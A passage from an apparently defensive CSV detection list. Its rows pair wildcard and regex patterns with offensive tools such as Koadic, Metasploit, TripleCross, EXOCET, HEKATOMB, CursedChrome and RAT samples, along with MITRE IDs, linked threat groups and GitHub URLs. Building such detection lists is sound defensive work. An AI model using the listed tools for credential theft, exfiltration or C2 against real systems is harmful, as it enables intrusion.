tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","7116" "*/exec_wmi*",".{0,1000}\/exec_wmi.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","7117" "*/exec0.py*",".{0,1000}\/exec0\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","7118" "*/Executable_Files.git*",".{0,1000}\/Executable_Files\.git.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - 
T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","7119" "*/execute_shellcode.exe*",".{0,1000}\/execute_shellcode\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","7120" "*/execute-api.eu-central-1.amazonaws.com/catspin_deployed*",".{0,1000}\/execute\-api\.eu\-central\-1\.amazonaws\.com\/catspin_deployed.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","1","N/A","N/A","9","3","261","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z","7121" "*/ExecuteCommand_x64_Release.exe*",".{0,1000}\/ExecuteCommand_x64_Release\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","7122" "*/execve_hijack*",".{0,1000}\/execve_hijack.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - 
TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","7123" "*/exegol.py*",".{0,1000}\/exegol\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","7124" "*/exegol_user_sources.list*",".{0,1000}\/exegol_user_sources\.list.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","7125" "*/exegol-docker-build/*",".{0,1000}\/exegol\-docker\-build\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","7126" "*/Exegol-history/*",".{0,1000}\/Exegol\-history\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","7127" "*/Exegol-images-*.zip*",".{0,1000}\/Exegol\-images\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","7128" "*/Exegol-images.git*",".{0,1000}\/Exegol\-images\.git.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","7129" "*/ExeStager/*",".{0,1000}\/ExeStager\/.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","7130" "*/exetotext.ps1*",".{0,1000}\/exetotext\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","7131" "*/exfilGui.ps1*",".{0,1000}\/exfilGui\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","7132" "*/exfiltrate.exe*",".{0,1000}\/exfiltrate\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","0","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","7133" "*/exocet.elf*",".{0,1000}\/exocet\.elf.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","1","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","7134" "*/exocet.exe*",".{0,1000}\/exocet\.exe.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - 
TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","1","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","7135" "*/EXOCET-AV-Evasion.git*",".{0,1000}\/EXOCET\-AV\-Evasion\.git.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","1","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","7136" "*/expl/expl.go*",".{0,1000}\/expl\/expl\.go.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tool","https://github.com/gbonacini/CVE-2016-5195","1","1","N/A","N/A","N/A","4","326","121","2017-03-21T16:46:38Z","2016-10-23T00:16:33Z","7137" "*/exploit.cron.sh*",".{0,1000}\/exploit\.cron\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","7138" "*/exploit.dll*",".{0,1000}\/exploit\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7139" "*/exploit.exe*",".{0,1000}\/exploit\.exe.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","1","N/A","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","7140" "*/exploit.ldpreload.sh*",".{0,1000}\/exploit\.ldpreload\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","7141" "*/exploit.pbj*",".{0,1000}\/exploit\.pbj.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7142" "*/exploit/linux/*",".{0,1000}\/exploit\/linux\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7143" "*/exploit/nc.exe*",".{0,1000}\/exploit\/nc\.exe.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","7144" "*/exploit/remote/*",".{0,1000}\/exploit\/remote\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7145" "*/exploit/windows/*",".{0,1000}\/exploit\/windows\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7146" "*/exploit_orw.py*",".{0,1000}\/exploit_orw\.py.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tool","https://github.com/d4em0n/exrop","1","1","N/A","N/A","N/A","3","285","22","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z","7147" "*/exploit_suggester.py*",".{0,1000}\/exploit_suggester\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","7148" 
"*/exported_credentials.csv*",".{0,1000}\/exported_credentials\.csv.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","#linux","N/A","10","6","510","59","2024-07-31T19:05:30Z","2022-09-09T15:07:15Z","7149" "*/exports_function_hid.txt*",".{0,1000}\/exports_function_hid\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","New Lateral Movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX 
- Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","N/A","10","10","291","48","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z","7150" "*/extension_injection.sh*",".{0,1000}\/extension_injection\.sh.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","1","N/A","on forked repo","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","7153" "*/extensions/kiwi/kiwi.rb*",".{0,1000}\/extensions\/kiwi\/kiwi\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7154" "*/ExtensionSpoof.exe*",".{0,1000}\/ExtensionSpoof\.exe.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","1","N/A","N/A","9","2","179","65","2024-12-12T18:05:28Z","2017-11-11T16:02:17Z","7155" "*/ExtensionSpoofer.git*",".{0,1000}\/ExtensionSpoofer\.git.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","1","N/A","N/A","9","2","179","65","2024-12-12T18:05:28Z","2017-11-11T16:02:17Z","7156" "*/ExternalC2/*",".{0,1000}\/ExternalC2\/.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","7157" "*/ExternalC2/*",".{0,1000}\/ExternalC2\/.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","7158" "*/extpassword.zip*",".{0,1000}\/extpassword\.zip.{0,1000}","offensive_tool_keyword","ExtPassword.exe","Nirsoft tool for Windows that allows you to recover passwords stored on external drive plugged to your computer","T1081 - T1003 - T1212","TA0006 - TA0009","N/A","LockBit","Credential Access","https://www.nirsoft.net/utils/external_drive_password_recovery.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","7159" "*/extract_wifi.exe*",".{0,1000}\/extract_wifi\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","7160" "*/ExtractBitlockerKeys.git*",".{0,1000}\/ExtractBitlockerKeys\.git.{0,1000}","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential 
Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","N/A","10","4","368","54","2025-01-31T09:39:55Z","2023-09-19T07:28:11Z","7161" "*/Exymna RAT.exe*",".{0,1000}\/Exymna\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","7162" "*/f5_bigip_tmui_rce.rb*",".{0,1000}\/f5_bigip_tmui_rce\.rb.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/jas502n/CVE-2020-5902","1","0","#linux","N/A","N/A","4","373","111","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z","7163" "*/Fa1c0n35/zabbix-cve-2022-23131*",".{0,1000}\/Fa1c0n35\/zabbix\-cve\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitation of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/trganda/CVE-2022-23131","1","1","N/A","N/A","N/A","1","1","1","2022-02-24T11:50:28Z","2022-02-24T08:10:46Z","7164" "*/Fake Error Message RAT.exe*",".{0,1000}\/Fake\sError\sMessage\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","7165"
"*/fake.html",".{0,1000}\/fake\.html","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","7166" "*/FakeCmdLine*",".{0,1000}\/FakeCmdLine.{0,1000}","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","1","N/A","N/A","N/A","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","7167" "*/FakeLogonScreen.exe*",".{0,1000}\/FakeLogonScreen\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - 